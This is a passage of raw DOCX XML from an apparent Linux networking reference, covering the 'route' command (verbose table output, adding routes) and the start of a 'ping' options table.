        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: 192.168.1.1 is the next hop used for this destination. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C28D119" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache entry</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Route decision cached for faster subsequent lookups. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739DCB6" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Avoids repeated route table lookups for same destinations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E91E707" w14:textId="12486922" w:rsidR="001B6F7F" w:rsidRPr="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Troubleshooting</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t>: Useful for verifying actual routing decisions made by kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7AB74" w14:textId="262F009D" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> View cached routing decisions for troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630931B1" w14:textId="220CC577" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Display kernel routing table (verbose)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4481C"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route -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71055A52" w14:textId="79815B17" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3BA144"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Kernel IP routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A69DF2"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Destination     Gateway         Genmask         Flags Metric Ref    Use Iface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A062A80"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0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19994552"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192.168.1.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055FC20" w14:textId="26CF7CC0" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C1B831" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verbose output</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Provides additional details about routing table entries. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A75EF8" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default route</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t>: 0.0.0.0/0.0.0.0 catches all traffic not matching specific routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0D507E" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local network</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: 192.168.1.0/255.255.255.0 is directly connected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D74FE" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag details</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: UG (Up+Gateway) vs U (Up only for direct routes). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611671EC" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metric values</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: 100 indicates priority level for route selection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA3E63" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reference counting</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Shows how many processes reference each route. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C697BC" w14:textId="41C463A1" w:rsidR="001B6F7F" w:rsidRPr="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usage statistics</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t>: Displays how often each route has been used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F6131" w14:textId="03CFA768" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Get detailed routing information with additional flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C107AEE" w14:textId="380B7485" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add temporary route with TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48C61D"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route add -net 203.0.113.0/24 gw 192.168.1.1 dev eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E53595" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Create temporary routes for testing network paths. </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Setting the default route for internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45454FF3" w14:textId="65A4CDFC" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add specific route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F18E74F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F48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route add -net 10.0.0.0/24 gw 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30387280" w14:textId="5CDE5673" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Routing specific network traffic through a particular gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D6468" w14:textId="29743E43" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Connectivity Testing Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B519D55" w14:textId="5F2CB472" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D9E86" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> command tests network connectivity by sending ICMP echo requests to a target host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4687350C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0AFA4E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:t>Test network connectivity and measure round-trip time to remote hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C316038" w14:textId="1DF1E41E" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D453509"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options] destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13107B4E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1602"/>
        <w:gridCol w:w="5255"/>
      </w:tblGrid>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="3E2DDDA7" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A571B80" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="00473DCD" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00473DCD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AC6F83B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="00473DCD" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00473DCD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="6E5E7B02" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009D3101"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lastRenderedPageBreak/>
              <w:t>-c count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296DA4F8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Number of packets to send</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="78DEEB26" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39A1FAEB"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i interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1623DCEB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Interval between packets (seconds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="0907BCAA" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF01176"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s size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06DA8AB4" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Packet size in bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="647B94A9" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08DD6BC0"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t ttl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="317B5BC0" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Time to live value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="724E3677" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74031545"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v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3553FE44" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="2B7B1F7F" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8C632C"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w deadline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DC57736" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Timeout in seconds to wait for reply</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="502D4ECE" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D740C8D"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W timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="581246A7" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Timeout for each packet in milliseconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="26BC9507" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75352261"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f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1274D283" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Flood ping (requires root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="2132A3C4" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BADF22E"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q</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B3090DF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Quiet output (summary only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="7874CC35" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC14722"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r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47D2AE48" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Bypass routing tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="3D1DD003" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33CAF51B"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R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C29DD5C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Record route</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="6C2E1477" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC1E8C5"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a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="190B93B4" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Audible ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="54FB504C" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ED3FC49"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b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65825B74" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Allow pinging a broadcast address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="4CB508E6" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="484467AC"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n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="034A1930" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Don't resolve hostnames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="43E40E05" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
